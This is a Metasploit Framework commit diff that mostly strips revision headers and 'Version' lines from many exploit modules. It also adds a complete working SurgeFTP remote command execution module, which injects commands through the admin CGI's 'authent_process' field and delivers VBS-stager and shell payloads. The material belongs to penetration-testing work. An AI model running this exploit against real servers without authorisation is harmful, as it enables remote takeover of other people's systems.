'References' => [ [ 'OSVDB', '66472'], diff --git a/modules/exploits/multi/browser/opera_historysearch.rb b/modules/exploits/multi/browser/opera_historysearch.rb index bbfb413203..2b0af53a2e 100644 --- a/modules/exploits/multi/browser/opera_historysearch.rb +++ b/modules/exploits/multi/browser/opera_historysearch.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -46,7 +42,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Aviv Raff ', # showed it to be exploitable for code exec 'egypt', # msf module ], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2008-4696'], diff --git a/modules/exploits/multi/browser/qtjava_pointer.rb b/modules/exploits/multi/browser/qtjava_pointer.rb index c44e10294e..45e5d24a54 100644 --- a/modules/exploits/multi/browser/qtjava_pointer.rb +++ b/modules/exploits/multi/browser/qtjava_pointer.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -36,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote 'kf', # Added support for Mac OS X X86 'ddz' # Discovered bug, provided tips ], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2007-2175'], diff --git a/modules/exploits/multi/fileformat/adobe_u3d_meshcont.rb b/modules/exploits/multi/fileformat/adobe_u3d_meshcont.rb index e8016dd78b..6479583f8a 100644 --- a/modules/exploits/multi/fileformat/adobe_u3d_meshcont.rb +++ b/modules/exploits/multi/fileformat/adobe_u3d_meshcont.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -32,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Felipe Andres Manzano ', 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-2990' ], diff --git a/modules/exploits/multi/fileformat/maple_maplet.rb b/modules/exploits/multi/fileformat/maple_maplet.rb index 3bd31ac05d..ba2e08299b 100644 --- a/modules/exploits/multi/fileformat/maple_maplet.rb +++ b/modules/exploits/multi/fileformat/maple_maplet.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -36,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'scriptjunkie' ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '64541'], diff --git a/modules/exploits/multi/fileformat/peazip_command_injection.rb b/modules/exploits/multi/fileformat/peazip_command_injection.rb index 1ffd0a9d08..46715783ae 100644 --- a/modules/exploits/multi/fileformat/peazip_command_injection.rb +++ b/modules/exploits/multi/fileformat/peazip_command_injection.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -36,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Nine:Situations:Group::pyrokinesis', 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-2261' ], diff --git a/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb b/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb index b1ffcfd64d..b0335b8fd0 100644 --- a/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb +++ b/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote specifiers, an attacker can corrupt memory and execute arbitrary code. }, 'Author' => [ 'jduck' ], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2000-0573'], diff --git a/modules/exploits/multi/handler.rb b/modules/exploits/multi/handler.rb index 05849ad767..bf541b1d47 100644 --- a/modules/exploits/multi/handler.rb +++ b/modules/exploits/multi/handler.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => ['hdm'], - 'Version' => '$Revision$', 'References' => [ ], 'Payload' => { diff --git a/modules/exploits/multi/http/freenas_exec_raw.rb b/modules/exploits/multi/http/freenas_exec_raw.rb index 98d42fa3c1..94f76a22c1 100644 --- a/modules/exploits/multi/http/freenas_exec_raw.rb +++ b/modules/exploits/multi/http/freenas_exec_raw.rb @@ -1,7 +1,3 @@ -## -# $Id$ -### - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://sourceforge.net/projects/freenas/files/stable/0.7.2/NOTES%200.7.2.5543.txt/download' ], diff --git a/modules/exploits/multi/http/glassfish_deployer.rb b/modules/exploits/multi/http/glassfish_deployer.rb index b218e158b7..33a034e39c 100644 --- a/modules/exploits/multi/http/glassfish_deployer.rb +++ b/modules/exploits/multi/http/glassfish_deployer.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote this module will try to bypass authentication instead by sending lowercase HTTP verbs. }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ #Msf module for Glassfish 3.0 diff --git a/modules/exploits/multi/http/jboss_bshdeployer.rb b/modules/exploits/multi/http/jboss_bshdeployer.rb index 0d64c776f4..fd14dd671d 100644 --- a/modules/exploits/multi/http/jboss_bshdeployer.rb +++ b/modules/exploits/multi/http/jboss_bshdeployer.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -34,7 +30,6 @@ class Metasploit3 < Msf::Exploit::Remote 'h0ng10' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-0738' ], # using a VERB other than GET/POST diff --git a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb index 09da6021f2..6b42a7312d 100644 --- a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb +++ b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC', 'Jacob Giannantonio', 'Patrick Hof', 'h0ng10' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-0738' ], # by using VERB other than GET/POST diff --git a/modules/exploits/multi/http/jboss_maindeployer.rb b/modules/exploits/multi/http/jboss_maindeployer.rb index e027ef90b5..a978dc9db6 100644 --- a/modules/exploits/multi/http/jboss_maindeployer.rb +++ b/modules/exploits/multi/http/jboss_maindeployer.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -32,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'jduck', 'Patrick Hof', 'h0ng10'], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-1036' ], diff --git a/modules/exploits/multi/http/netwin_surgeftp_exec.rb b/modules/exploits/multi/http/netwin_surgeftp_exec.rb new file mode 100644 index 0000000000..b546de063f --- /dev/null +++ b/modules/exploits/multi/http/netwin_surgeftp_exec.rb @@ -0,0 +1,126 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = GoodRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStagerVBS + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Netwin SurgeFTP Remote Command Execution', + 'Description' => %q{ + This module exploits a vulnerability found in Netwin SurgeFTP, version 23c8 + or prior. In order to execute commands via the FTP service, please note that + you must have a valid credential to the web-based administrative console. + }, + 'Author' => + [ + 'Spencer McIntyre', #Who found this vuln? + 'sinn3r' + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['EDB', '23522'] + ], + 'Targets' => + [ + [ 'Windows', { 'Arch'=>ARCH_X86, 'Platform'=>'win'} ], + [ 'Unix', { 'Arch'=>ARCH_CMD, 'Platform'=>'unix', 'Payload'=>{'BadChars' => "\x22"}} ] + ], + 'DisclosureDate' => 'Dec 06 2012')) + + register_options( + [ + Opt::RPORT(7021), + OptString.new('USERNAME', [ true, 'The username with admin role to authenticate as', 'admin' ]), + OptString.new('PASSWORD', [ true, 'The password for the specified username', 'password' ]) + ], self.class) + end + + def check + res = send_request_raw({'uri'=>'/cgi/surgeftpmgr.cgi'}) + if res and res.body =~ /surgeftp\x20\x0d\x0a\x20\x20Manager CGI/ + return Exploit::CheckCode::Detected + else + return Exploit::CheckCode::Safe + end + end + + def execute_command(cmd, opts) + http_send_command("cmd.exe /q /c #{cmd}") + end + + def http_send_command(command) + res = send_request_cgi( + { + 'uri' => '/cgi/surgeftpmgr.cgi', + 'method' => 'POST', + 'basic_auth' => datastore['USERNAME'] + ":" + datastore['PASSWORD'], + 'vars_post' => + { + 'global_smtp' => "", + 'global_restart' => "", + 'global_style' => "", + 'global_bind' => "", + 'global_passive_ip' => "", + 'global_passive_match' => "", + 'global_logon_mode' => "", + 'global_log_host' => "", + 'global_login_error' => "", + 'global_adminip' => "", + 'global_total_users' => "", + 'global_con_perip' => "", + 'global_ssl' => "", + 'global_ssl_cipher_list' => "", + 'global_implicit_port' => "", + 'log_level' => "", + 'log_home' => "", + 'global_watcher_program_ul' => "", + 'global_watcher_program_dl' => "", + 'authent_process' => command, + 'authent_cmdopts' => "", + 'authent_number' => "", + 'authent_domain' => "", + 'global_strip_user_domain' => "", + 'global_noclass' => "", + 'global_anon_hammer_over_time' => "", + 'global_anon_hammer_max' => "", + 'global_anon_hammer_block_time' => "", + 'global_port' => "", + 'global_mgr_port' => "", + 'global_mgr_ssl_port' => "", + 'cmd_global_save.x' => "36", + 'cmd_global_save.y' => "8", + } + }) + + if res and res.body =~ /401 Authorization failed/ + fail_with(Exploit::Failure::NoAccess, "Unable to log in!") + elsif not (res and res.code == 200) + fail_with(Exploit::Failure::Unknown, 'Failed to execute command.') + end + end + + def exploit + case target['Platform'] + when 'win' + print_status("#{rhost}:#{rport} - Sending VBS stager...") + execute_cmdstager({:linemax=>500}) + + when 'unix' + print_status("#{rhost}:#{rport} - Sending payload...") + http_send_command(%Q|/bin/sh -c "#{payload.encoded}"|) + end + + handler + end +end \ No newline at end of file diff --git a/modules/exploits/multi/http/php_cgi_arg_injection.rb b/modules/exploits/multi/http/php_cgi_arg_injection.rb index 24be258749..9ee87e5756 100644 --- a/modules/exploits/multi/http/php_cgi_arg_injection.rb +++ b/modules/exploits/multi/http/php_cgi_arg_injection.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -35,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jjarmoc' #added URI encoding obfuscation ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE' , '2012-1823' ], [ 'OSVDB', '81633'], diff --git a/modules/exploits/multi/http/phpldapadmin_query_engine.rb b/modules/exploits/multi/http/phpldapadmin_query_engine.rb index 49c9d14a58..b1c359289d 100644 --- a/modules/exploits/multi/http/phpldapadmin_query_engine.rb +++ b/modules/exploits/multi/http/phpldapadmin_query_engine.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -32,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote 'TecR0c ', # msf ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2011-4075'], diff --git a/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb b/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb index d95b9a5609..1ebb9d5a24 100644 --- a/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb +++ b/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['URL', 'http://www.phpmyadmin.net/home_page/security/PMASA-2012-5.php'] ], 'Privileged' => false, 'Payload' => diff --git a/modules/exploits/multi/http/phpscheduleit_start_date.rb b/modules/exploits/multi/http/phpscheduleit_start_date.rb index a32a68dfce..e6b13c6427 100644 --- a/modules/exploits/multi/http/phpscheduleit_start_date.rb +++ b/modules/exploits/multi/http/phpscheduleit_start_date.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -32,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote 'juan vazquez' # Metasploit module ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2008-6132'], diff --git a/modules/exploits/multi/http/snortreport_exec.rb b/modules/exploits/multi/http/snortreport_exec.rb index c4821a3884..f4dc3edbaa 100644 --- a/modules/exploits/multi/http/snortreport_exec.rb +++ b/modules/exploits/multi/http/snortreport_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'Paul Rascagneres' #itrust consulting during hack.lu 2011 ], - 'Version' => '$Revision$', 'References' => [ ['OSVDB', '67739'], diff --git a/modules/exploits/multi/http/spree_search_exec.rb b/modules/exploits/multi/http/spree_search_exec.rb index cdbaf05c90..e48e1148b7 100644 --- a/modules/exploits/multi/http/spree_search_exec.rb +++ b/modules/exploits/multi/http/spree_search_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'joernchen ' ], #Phenoelit 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '76011'], diff --git a/modules/exploits/multi/http/spree_searchlogic_exec.rb b/modules/exploits/multi/http/spree_searchlogic_exec.rb index e79edf2c21..3bf8adb859 100644 --- a/modules/exploits/multi/http/spree_searchlogic_exec.rb +++ b/modules/exploits/multi/http/spree_searchlogic_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'joernchen ' ], #Phenoelit 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '71900'], diff --git a/modules/exploits/multi/http/struts_code_exec.rb b/modules/exploits/multi/http/struts_code_exec.rb index 554a968c4e..982b3c100d 100644 --- a/modules/exploits/multi/http/struts_code_exec.rb +++ b/modules/exploits/multi/http/struts_code_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -35,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Meder Kydyraliev', # original public exploit ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-1870'], diff --git a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb index 277b65efa4..caa7d8b2da 100644 --- a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb +++ b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb @@ -33,7 +33,6 @@ class Metasploit3 < Msf::Exploit::Remote 'mihi' # ARCH_JAVA support ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2012-0391'], diff --git a/modules/exploits/multi/http/sun_jsws_dav_options.rb b/modules/exploits/multi/http/sun_jsws_dav_options.rb index 92cfb0cb18..7676d62c8b 100644 --- a/modules/exploits/multi/http/sun_jsws_dav_options.rb +++ b/modules/exploits/multi/http/sun_jsws_dav_options.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -35,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote Intevydis. }, 'Author' => 'jduck', - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-0361' ], diff --git a/modules/exploits/multi/http/tomcat_mgr_deploy.rb b/modules/exploits/multi/http/tomcat_mgr_deploy.rb index 1632d1aea5..831e31a30d 100644 --- a/modules/exploits/multi/http/tomcat_mgr_deploy.rb +++ b/modules/exploits/multi/http/tomcat_mgr_deploy.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -35,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ # There is no single vulnerability associated with deployment functionality. diff --git a/modules/exploits/multi/misc/java_rmi_server.rb b/modules/exploits/multi/misc/java_rmi_server.rb index b36472cddb..2c13434db8 100644 --- a/modules/exploits/multi/misc/java_rmi_server.rb +++ b/modules/exploits/multi/misc/java_rmi_server.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -35,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'mihi' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ # RMI protocol specification diff --git a/modules/exploits/multi/misc/openview_omniback_exec.rb b/modules/exploits/multi/misc/openview_omniback_exec.rb index 57ffa7ffe7..618d3ecf54 100644 --- a/modules/exploits/multi/misc/openview_omniback_exec.rb +++ b/modules/exploits/multi/misc/openview_omniback_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm', 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2001-0311'], diff --git a/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb b/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb index 9019442378..dfd9b3dd1f 100644 --- a/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb +++ b/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-1389' ], diff --git a/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb b/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb index 23e76348b5..2c9a14a689 100644 --- a/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb +++ b/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -46,7 +42,6 @@ class Metasploit3 < Msf::Exploit::Remote 'redsand' # windows target/testing ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-0304' ], diff --git a/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb b/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb index 2b70955a89..a02d71e633 100644 --- a/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb +++ b/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -47,7 +43,6 @@ class Metasploit3 < Msf::Exploit::Remote 'redsand' # windows target/testing ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-0304' ], diff --git a/modules/exploits/multi/misc/zend_java_bridge.rb b/modules/exploits/multi/misc/zend_java_bridge.rb index 8b7712e296..0bd37ab9c7 100644 --- a/modules/exploits/multi/misc/zend_java_bridge.rb +++ b/modules/exploits/multi/misc/zend_java_bridge.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -33,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'bannedit' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '71420'], diff --git a/modules/exploits/multi/ntp/ntp_overflow.rb b/modules/exploits/multi/ntp/ntp_overflow.rb index 02731224f6..168cb57a67 100644 --- a/modules/exploits/multi/ntp/ntp_overflow.rb +++ b/modules/exploits/multi/ntp/ntp_overflow.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'patrick', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2001-0414' ], diff --git a/modules/exploits/multi/php/php_unserialize_zval_cookie.rb b/modules/exploits/multi/php/php_unserialize_zval_cookie.rb index b927a91c92..768ebea6bc 100644 --- a/modules/exploits/multi/php/php_unserialize_zval_cookie.rb +++ b/modules/exploits/multi/php/php_unserialize_zval_cookie.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -44,7 +40,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Stefan Esser ' # discovered, patched, exploited ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2007-1286'], diff --git a/modules/exploits/multi/realserver/describe.rb b/modules/exploits/multi/realserver/describe.rb index 19384a2a57..431750599e 100644 --- a/modules/exploits/multi/realserver/describe.rb +++ b/modules/exploits/multi/realserver/describe.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote servers. }, 'Author' => 'hdm', - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2002-1643' ], diff --git a/modules/exploits/multi/samba/nttrans.rb b/modules/exploits/multi/samba/nttrans.rb index 65441d9bae..da00c38fc2 100644 --- a/modules/exploits/multi/samba/nttrans.rb +++ b/modules/exploits/multi/samba/nttrans.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2002-1318' ], diff --git a/modules/exploits/multi/samba/usermap_script.rb b/modules/exploits/multi/samba/usermap_script.rb index 66f1ea5277..e67a4d5106 100644 --- a/modules/exploits/multi/samba/usermap_script.rb +++ b/modules/exploits/multi/samba/usermap_script.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -35,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-2447' ], diff --git a/modules/exploits/multi/svn/svnserve_date.rb b/modules/exploits/multi/svn/svnserve_date.rb index d8867a4121..38566abeda 100644 --- a/modules/exploits/multi/svn/svnserve_date.rb +++ b/modules/exploits/multi/svn/svnserve_date.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote it during testing) corrupt the subversion database, so be careful! }, 'Author' => 'spoonm', - 'Version' => '$Revision$', 'References' => [ ['CVE', '2004-0397'], diff --git a/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb b/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb index ef8adb049d..211e9dd7c7 100644 --- a/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb +++ b/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Stance' => Msf::Exploit::Stance::Aggressive, 'Author' => 'kf', - 'Version' => '$Revision$', 'References' => [ ['CVE', '2009-0695'], diff --git a/modules/exploits/netware/smb/lsass_cifs.rb b/modules/exploits/netware/smb/lsass_cifs.rb index 2d5bdee165..4928d83b9e 100644 --- a/modules/exploits/netware/smb/lsass_cifs.rb +++ b/modules/exploits/netware/smb/lsass_cifs.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote 'toto', ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-2852' ], diff --git a/modules/exploits/netware/sunrpc/pkernel_callit.rb b/modules/exploits/netware/sunrpc/pkernel_callit.rb index 9eaa359701..daa9b07ff5 100644 --- a/modules/exploits/netware/sunrpc/pkernel_callit.rb +++ b/modules/exploits/netware/sunrpc/pkernel_callit.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'pahtzo', ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ # There is no CVE for this vulnerability diff --git a/modules/exploits/osx/afp/loginext.rb b/modules/exploits/osx/afp/loginext.rb index ff8df42198..101e29146b 100644 --- a/modules/exploits/osx/afp/loginext.rb +++ b/modules/exploits/osx/afp/loginext.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'hdm', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-0430'], diff --git a/modules/exploits/osx/arkeia/type77.rb b/modules/exploits/osx/arkeia/type77.rb index c4457b56f1..22ecd2fd91 100644 --- a/modules/exploits/osx/arkeia/type77.rb +++ b/modules/exploits/osx/arkeia/type77.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-0491'], diff --git a/modules/exploits/osx/browser/safari_file_policy.rb b/modules/exploits/osx/browser/safari_file_policy.rb index d5c7358070..f4e149e274 100644 --- a/modules/exploits/osx/browser/safari_file_policy.rb +++ b/modules/exploits/osx/browser/safari_file_policy.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -36,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote Xcode instead of executing it, in that case please try the Java ones instead. }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ 'Aaron Sigel', # Initial discovery diff --git a/modules/exploits/osx/browser/safari_metadata_archive.rb b/modules/exploits/osx/browser/safari_metadata_archive.rb index 22487578cd..2d3c818f3c 100644 --- a/modules/exploits/osx/browser/safari_metadata_archive.rb +++ b/modules/exploits/osx/browser/safari_metadata_archive.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and 